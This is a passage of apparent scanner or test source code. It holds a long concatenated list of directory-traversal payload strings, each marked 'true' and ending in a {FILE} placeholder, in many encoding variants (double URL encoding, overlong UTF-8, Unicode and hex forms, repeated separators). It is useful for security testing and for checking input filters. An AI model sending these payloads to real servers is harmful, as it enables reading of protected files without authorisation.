"true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,\\../{FILE}", + "true,\\../\\../{FILE}", + "true,\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}", + "true,/..\\{FILE}", + "true,/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}", + "true,.../{FILE}", + "true,.../.../{FILE}", + "true,.../.../.../{FILE}", + "true,.../.../.../.../{FILE}", + "true,.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../{FILE}", + "true,.../.../.../.../.../.../.../.../{FILE}", + "true,...\\{FILE}", + "true,...\\...\\{FILE}", + "true,...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}", + "true,..../{FILE}", + "true,..../..../{FILE}", + "true,..../..../..../{FILE}", + "true,..../..../..../..../{FILE}", + "true,..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../{FILE}", + "true,..../..../..../..../..../..../..../..../{FILE}", + "true,....\\{FILE}", + "true,....\\....\\{FILE}", + "true,....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}", + "true,........................................................................../{FILE}", + "true,........................................................................../../{FILE}", + "true,........................................................................../../../{FILE}", + "true,........................................................................../../../../{FILE}", + "true,........................................................................../../../../../{FILE}", + "true,........................................................................../../../../../../{FILE}", + "true,........................................................................../../../../../../../{FILE}", + "true,........................................................................../../../../../../../../{FILE}", + "true,..........................................................................\\{FILE}", + "true,..........................................................................\\..\\{FILE}", + "true,..........................................................................\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%u2215{FILE}", + "true,..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}", + "true,%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}", + "true,%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}", + "true,..%u2216{FILE}", + "true,..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}", + "true,..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}", + "true,..%uF025{FILE}", + "true,..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}", + "true,%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}", + "true,%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}", + "true,..0x2f{FILE}", + "true,..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}", + "true,0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}", + "true,0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}", + "true,..0x5c{FILE}", + "true,..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}", + "true,0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}", + "true,0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}", + "true,..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}", + "true,%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}", + "true,%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}", + "true,..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}", + "true,%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}", + "true,%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}", + "true,///%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,\\\\\\%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,..//{FILE}", + "true,..//..//{FILE}", + "true,..//..//..//{FILE}", + "true,..//..//..//..//{FILE}", + "true,..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//{FILE}", + "true,..//..//..//..//..//..//..//..//{FILE}", + "true,..///{FILE}", + "true,..///..///{FILE}", + "true,..///..///..///{FILE}", + "true,..///..///..///..///{FILE}", + "true,..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///{FILE}", + "true,..///..///..///..///..///..///..///..///{FILE}", + "true,..\\\\{FILE}", + "true,..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}", + "true,..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}", + "true,./\\/./{FILE}", + "true,./\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}", + "true,.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}", + "true,././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}", + "true,.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}", + 